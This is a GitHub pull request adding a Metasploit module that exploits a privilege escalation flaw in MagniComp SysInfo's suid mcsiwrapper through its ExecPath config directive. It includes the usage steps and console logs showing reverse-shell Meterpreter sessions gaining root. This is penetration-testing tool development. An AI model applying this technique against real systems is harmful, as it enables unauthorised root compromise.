Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add MagniComp SysInfo mcsiwrapper Privilege Escalation exploit #9504

Merged
merged 3 commits into from Feb 20, 2018

Conversation

@bcoles
Copy link
Contributor

bcoles commented Feb 5, 2018

Add MagniComp SysInfo mcsiwrapper Privilege Escalation exploit.

        This module attempts to gain root privileges on systems running
        MagniComp SysInfo versions prior to 10-H64.

        The .mcsiwrapper suid executable allows loading a config file using the
        '--configfile' argument. The 'ExecPath' config directive is used to set
        the executable load path. This module abuses this functionality to set
        the load path resulting in execution of arbitrary code as root.

        This module has been tested successfully with SysInfo version
        10-H63 on Fedora 20 x86_64 and 10-GA on Solaris 10u11 x86.

Verification

  • Start msfconsole
  • Get a session
  • use use multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc
  • set SESSION <ID>
  • run
  • Verify you get a root session

Example Output

msf > use exploit/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc
msf exploit(multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc) > set session 1
session => 1
msf exploit(multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.244:4444
[*] Using target: Linux
[*] Writing '/tmp/.0rk4PC/vFdxxuBVkh' (21 bytes) ...
[*] Writing '/tmp/.0rk4PC/eoGVzYwGa' (207 bytes) ...
[*] Executing payload...
[*] Sending stage (857352 bytes) to 172.16.191.137
[*] Meterpreter session 2 opened (172.16.191.244:4444 -> 172.16.191.137:42229) at 2018-02-05 07:38:35 -0500
[+] Deleted /tmp/.0rk4PC/vFdxxuBVkh
[+] Deleted /tmp/.0rk4PC/eoGVzYwGa
[+] Deleted /tmp/.0rk4PC

meterpreter > getuid
Server username: uid=0, gid=1000, euid=1000, egid=1000
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Fedora 20 (Linux 3.19.8-100.fc20.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >
@bcoles bcoles added module docs labels Feb 5, 2018
@Chiggins

This comment has been minimized.

Copy link
Contributor

Chiggins commented Feb 7, 2018

If anyone doesn't mind, I'm going to self assign for my first PR as a committer. 💯

@Chiggins Chiggins self-assigned this Feb 7, 2018
@busterb

This comment has been minimized.

Copy link
Member

busterb commented Feb 7, 2018

Go for it!

@Chiggins

This comment has been minimized.

Copy link
Contributor

Chiggins commented Feb 7, 2018

Tested against Fedora 27 and it worked like a charm!

msf5 exploit(multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc) > run

[*] Started reverse TCP handler on 192.168.1.252:4445 
[*] Using target: Linux
[*] Writing '/tmp/.Duxko1/9M2WGR' (21 bytes) ...
[*] Writing '/tmp/.Duxko1/zuc5EBYz' (207 bytes) ...
[*] Executing payload...
[*] Sending stage (857352 bytes) to 192.168.1.162

meterpreter > sysinfo 
Computer     : fedora27.chigs.local
OS           : Fedora 27 (Linux 4.13.9-300.fc27.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > getuid 
Server username: uid=0, gid=1000, euid=0, egid=1000

@Chiggins Chiggins merged commit 1177efe into rapid7:master Feb 20, 2018
1 check passed
1 check passed
continuous-integration/travis-ci/pr The Travis CI build passed
Details
Chiggins added a commit that referenced this pull request Feb 20, 2018
@bcoles bcoles deleted the bcoles:magnicomp_sysinfo_mcsiwrapper_priv_esc branch Feb 20, 2018
jmartin-r7 added a commit that referenced this pull request Feb 20, 2018
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Linked issues

Successfully merging this pull request may close these issues.

None yet

3 participants
You can’t perform that action at this time.